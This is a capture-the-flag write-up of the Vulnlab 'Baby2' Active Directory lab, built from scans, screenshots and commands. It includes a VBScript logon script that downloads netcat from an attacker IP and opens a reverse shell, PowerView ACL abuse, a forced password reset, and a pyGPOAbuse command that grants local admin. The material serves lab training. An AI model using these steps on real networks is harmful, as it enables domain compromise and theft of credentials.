mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 13:03:01 +00:00
144 lines
5.2 KiB
Markdown
144 lines
5.2 KiB
Markdown
|
# Vulnlab - Baby2
|
||
|
|
||
|
```bash
|
||
|
PORT STATE SERVICE VERSION
|
||
|
53/tcp open domain Simple DNS Plus
|
||
|
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-08 10:27:13Z)
|
||
|
135/tcp open msrpc Microsoft Windows RPC
|
||
|
139/tcp open tcpwrapped
|
||
|
389/tcp open tcpwrapped
|
||
|
|_ssl-date: TLS randomness does not represent time
|
||
|
| ssl-cert: Subject: commonName=dc.baby2.vl
|
||
|
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
|
||
|
| Issuer: commonName=baby2-CA
|
||
|
| Public Key type: rsa
|
||
|
| Public Key bits: 2048
|
||
|
| Signature Algorithm: sha256WithRSAEncryption
|
||
|
| Not valid before: 2023-08-22T17:39:15
|
||
|
| Not valid after: 2024-08-21T17:39:15
|
||
|
| MD5: 86833092b739d099392a9fba548ca41d
|
||
|
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
|
||
|
445/tcp open tcpwrapped
|
||
|
3269/tcp open tcpwrapped
|
||
|
|_ssl-date: TLS randomness does not represent time
|
||
|
| ssl-cert: Subject: commonName=dc.baby2.vl
|
||
|
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
|
||
|
| Issuer: commonName=baby2-CA
|
||
|
| Public Key type: rsa
|
||
|
| Public Key bits: 2048
|
||
|
| Signature Algorithm: sha256WithRSAEncryption
|
||
|
| Not valid before: 2023-08-22T17:39:15
|
||
|
| Not valid after: 2024-08-21T17:39:15
|
||
|
| MD5: 86833092b739d099392a9fba548ca41d
|
||
|
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
|
||
|
3389/tcp open tcpwrapped
|
||
|
| ssl-cert: Subject: commonName=dc.baby2.vl
|
||
|
```
|
||
|
|
||
|
Enumerating smb shares with null authentication
|
||
|
|
||
|
<img src="https://i.imgur.com/iwh9V3j.png"/>
|
||
|
From `homes` share, we can find some directories for users
|
||
|
|
||
|
<img src="https://i.imgur.com/rCHltWz.png"/>
|
||
|
|
||
|
Also from `apps` share there's `login.vbs.lnk`
|
||
|
|
||
|
<img src="https://i.imgur.com/U86Xlkn.png"/>
|
||
|
|
||
|
With kerbrute we can verify these users also check if pre-authentication is disabled for AS-REP roasting
|
||
|
|
||
|
<img src="https://i.imgur.com/CCnOfDi.png"/>
|
||
|
From `NETLOGON` there's the login.vbs but it doesn't really seemed useful
|
||
|
|
||
|
<img src="https://i.imgur.com/YHBmO9k.png"/>
|
||
|
|
||
|
# Foothold (Amelia)
|
||
|
|
||
|
From the users, there's library which seems odd, on trying to login with the password `library` it shows that's a valid login
|
||
|
|
||
|
<img src="https://i.imgur.com/geyjqwp.png"/>
|
||
|
|
||
|
This user has READ access on SYSVOL share
|
||
|
|
||
|
<img src="https://i.imgur.com/iferM0F.png"/>
|
||
|
|
||
|
Also running bloodhound to enumerate domain
|
||
|
|
||
|
```bash
|
||
|
python3 /opt/BloodHound.py/bloodhound.py -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.105.23
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/Y8HWO8w.png"/>
|
||
|
|
||
|
This user didn't had any ACLs but running the `shortest path to high value targets` , members of `LEGACY` group has `WriteDacl` on `GPOADM` which further has `GenericAll` on `Group Policy Object (GPO)`
|
||
|
|
||
|
<img src="https://i.imgur.com/s5P6q4Q.png"/>
|
||
|
|
||
|
But for now we need to focus on logon script, even tho from the output of crackmapexec, it showed that we only have READ access on SYSVOL, we can still overwrite the login.vbs file from scripts folder, just point the network share to our IP
|
||
|
|
||
|
<img src="https://i.imgur.com/6rvCTqy.png"/>
|
||
|
|
||
|
Have responder or smbserver ready and upload the file
|
||
|
|
||
|
<img src="https://i.imgur.com/dQa7HVg.png"/>
|
||
|
|
||
|
On responder, we'll receive the NTLMv1 hash of `Amelia`
|
||
|
|
||
|
<img src="https://i.imgur.com/wwMsSh2.png"/>
|
||
|
But I wasn't able to crack this hash, instead we can just modify the vbs script to get a reverse shell
|
||
|
|
||
|
```vb
|
||
|
Set oShell = CreateObject("Wscript.Shell")
|
||
|
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
|
||
|
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/dzHBcYj.png"/>
|
||
|
|
||
|
<img src="https://i.imgur.com/I37QCPk.png"/>
|
||
|
|
||
|
Check in which groups amelia belongs to
|
||
|
|
||
|
<img src="https://i.imgur.com/19T5Ed8.png"/>
|
||
|
|
||
|
This account is a member of legacy group, meaning that we can abuse WriteDACL on GPOADM, with `PowerView` granting GenericAll on GPOADM
|
||
|
|
||
|
```bash
|
||
|
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -Verbose
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/ER8RoPp.png"/>
|
||
|
Now we can change the password for GPOADM
|
||
|
|
||
|
```powershell
|
||
|
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||
|
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/1BdrGsj.png"/>
|
||
|
<img src="https://i.imgur.com/sD0oITq.png"/>
|
||
|
|
||
|
Using pyGPOAbuse https://github.com/Hackndo/pyGPOAbuse, we can create immediate scheduled task which will get executed as SYSTEM user to add GPOADM in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current impacket version), we'll need the GPO ID for creating the task
|
||
|
|
||
|
<img src="https://i.imgur.com/6LMSME5.png"/>
|
||
|
|
||
|
```bash
|
||
|
python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f
|
||
|
```
|
||
|
|
||
|
<img src="https://i.imgur.com/YYjC6iJ.png"/>
|
||
|
|
||
|
Wait for few seconds for the created task to be executed, we'll see GPOADM being a part of administrators group
|
||
|
|
||
|
<img src="https://i.imgur.com/3Ey6wZN.png"/>
|
||
|
|
||
|
Now we can login through WinRM
|
||
|
|
||
|
<img src="https://i.imgur.com/P5rnhWd.png"/>
|
||
|
|
||
|
# References
|
||
|
|
||
|
- https://github.com/Hackndo/pyGPOAbuse
|
||
|
- https://www.thehacker.recipes/ad/movement/group-policies
|